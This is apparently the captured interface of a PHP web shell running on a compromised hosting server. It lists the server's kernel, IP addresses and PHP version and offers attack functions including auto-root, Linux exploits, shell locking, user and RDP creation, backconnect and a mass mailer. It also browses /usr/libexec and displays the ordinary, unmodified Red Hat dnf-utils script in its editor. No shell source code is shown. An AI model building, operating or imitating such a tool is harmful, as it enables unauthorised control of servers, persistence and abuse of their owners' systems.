Linux 120.141.167.72.host.secureserver.net 4.18.0-553.150.1.el8_10.x86_64 #1 SMP Fri Jul 31 15:23:31 EDT 2026 x86_64
Apache
: 72.167.141.120 | : 216.73.217.14
808 Domain
7.4.33
bestseocompany
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
libexec /
[ HOME SHELL ]
Name
Size
Permission
Action
awk
[ DIR ]
drwxr-xr-x
coreutils
[ DIR ]
drwxr-xr-x
cpanel-pdns
[ DIR ]
drwxr-xr-x
dbus-1
[ DIR ]
drwxr-xr-x
dovecot
[ DIR ]
drwxr-xr-x
gawk
[ DIR ]
drwxr-xr-x
gcc
[ DIR ]
drwxr-xr-x
getconf
[ DIR ]
drwxr-xr-x
grubby
[ DIR ]
drwxr-xr-x
hostname
[ DIR ]
drwxr-xr-x
imunify360
[ DIR ]
drwxr-xr-x
initscripts
[ DIR ]
drwxr-xr-x
installkernel
[ DIR ]
drwxr-xr-x
iptables
[ DIR ]
drwxr-xr-x
kcare
[ DIR ]
drwxr-xr-x
linux-boot-probes
[ DIR ]
drwxr-xr-x
man-db
[ DIR ]
drwxr-xr-x
microcode_ctl
[ DIR ]
drwxr-xr-x
nfs-utils
[ DIR ]
drwxr-xr-x
oddjob
[ DIR ]
drwxr-xr-x
openldap
[ DIR ]
drwxr-xr-x
openssh
[ DIR ]
drwxr-xr-x
os-prober
[ DIR ]
drwxr-xr-x
os-probes
[ DIR ]
drwxr-xr-x
p11-kit
[ DIR ]
drwxr-xr-x
plymouth
[ DIR ]
drwxr-xr-x
proftpd
[ DIR ]
drwxr-xr-x
selinux
[ DIR ]
drwxr-xr-x
smartmontools
[ DIR ]
drwxr-xr-x
sssd
[ DIR ]
drwxr-xr-x
sudo
[ DIR ]
drwxr-xr-x
tuned
[ DIR ]
drwxr-xr-x
utempter
[ DIR ]
drwxr-xr-x
w3m
[ DIR ]
drwxr-xr-x
audit-functions
990
B
-rwxr-x---
chrony-helper
7.17
KB
-rwxr-xr-x
dirmngr_ldap
87.33
KB
-rwxr-xr-x
dnf-utils
3.62
KB
-rwxr-xr-x
ebtables
1.33
KB
-rwxr-xr-x
exim.daemon
758
B
-rwxr-xr-x
generate-rndc-key.sh
546
B
-rwxr-xr-x
gpg-check-pattern
111.91
KB
-rwxr-xr-x
gpg-preset-passphrase
87.23
KB
-rwxr-xr-x
gpg-protect-tool
206.38
KB
-rwxr-xr-x
gpg-wks-client
227.23
KB
-rwxr-xr-x
grepconf.sh
253
B
-rwxr-xr-x
import-state
1.03
KB
-rwxr-xr-x
loadmodules
233
B
-rwxr-xr-x
nfsrahead
37.13
KB
-rwxr-xr-x
nm-daemon-helper
12.6
KB
-rwxr-xr-x
nm-dhcp-helper
16.2
KB
-rwxr-xr-x
nm-dispatcher
66.16
KB
-rwxr-xr-x
nm-initrd-generator
740.48
KB
-rwxr-xr-x
no-python
157
B
-rwxr-xr-x
platform-python
11.59
KB
-rwxr-xr-x
platform-python-config
204
B
-rwxr-xr-x
platform-python3.6
11.59
KB
-rwxr-xr-x
platform-python3.6-config
204
B
-rwxr-xr-x
platform-python3.6m
11.59
KB
-rwxr-xr-x
platform-python3.6m-config
204
B
-rwxr-xr-x
platform-python3.6m-x86_64-con...
3.54
KB
-rwxr-xr-x
scdaemon
442.41
KB
-rwxr-xr-x
tcawmgr.cgi
25.1
KB
-rwxr-xr-x
virt-what-cpuid-helper
7.91
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : dnf-utils
#!/usr/libexec/platform-python # The dnf-utils executable script. # # Copyright (C) 2017 Red Hat, Inc. # # This copyrighted material is made available to anyone wishing to use, # modify, copy, or redistribute it subject to the terms and conditions of # the GNU General Public License v.2, or (at your option) any later version. # This program is distributed in the hope that it will be useful, but WITHOUT # ANY WARRANTY expressed or implied, including the implied warranties of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General # Public License for more details. You should have received a copy of the # GNU General Public License along with this program; if not, write to the # Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA # 02110-1301, USA. Any Red Hat trademarks that are incorporated in the # source code or documentation are not subject to the GNU General Public # License and may only be used or replicated with the express permission of # Red Hat, Inc. # from __future__ import unicode_literals import sys import os.path MAPPING = {'debuginfo-install': ['debuginfo-install'], 'needs-restarting': ['needs-restarting'], 'find-repos-of-install': ['list', 'installed'], 'package-cleanup': [], 'repo-graph': ['repograph'], 'repoclosure': ['repoclosure'], 'repodiff': ['repodiff'], 'repomanage': ['repomanage'], 'repoquery': ['repoquery'], 'reposync': ['reposync'], 'repotrack': ['download', '--resolve', '--alldeps'], 'yum-builddep': ['builddep'], 'yum-config-manager': ['config-manager'], 'yum-debug-dump': ['debug-dump'], 'yum-debug-restore': ['debug-restore'], 'yum-groups-manager': ['groups-manager'], 'yumdownloader': ['download'] } def suppress_keyboard_interrupt_message(): """Prevent unsightly KeyboardInterrupt tracebacks. Nothing will be printed to the terminal after an uncaught :class:`exceptions.KeyboardInterrupt`. """ old_excepthook = sys.excepthook def new_hook(type, value, traceback): if type != KeyboardInterrupt: old_excepthook(type, value, traceback) else: pass sys.excepthook = new_hook # do this ASAP to prevent tracebacks after ^C during imports suppress_keyboard_interrupt_message() if __name__ != "__main__": sys.stderr.write('The executable DNF module must not be imported.') sys.exit(1) here = sys.path[0] if here != '/usr/bin': # git checkout import os dnf_toplevel = os.path.dirname(here) sys.path[0] = dnf_toplevel from dnf.cli import main command = os.path.basename(sys.argv[0]) args = sys.argv[1:] if command == 'package-cleanup': if '--dupes' in args: args[args.index('--dupes')] = '--duplicates' MAPPING[command] = ['repoquery'] elif '--leaves' in args: args[args.index('--leaves')] = '--unneeded' MAPPING[command] = ['repoquery'] elif '--orphans' in args: args[args.index('--orphans')] = '--extras' MAPPING[command] = ['repoquery'] elif '--problems' in args: args[args.index('--problems')] = '--unsatisfied' MAPPING[command] = ['repoquery'] elif '--cleandupes' in args: args[args.index('--cleandupes')] = '--duplicates' MAPPING[command] = ['remove'] else: sys.stderr.write('package-cleanup has to be executed with one of the options: --dupes, ' '--leaves, --orphans, --problems or --cleandupes\n') sys.exit(1) main.user_main(MAPPING[command] + args, exit_code=True)
Close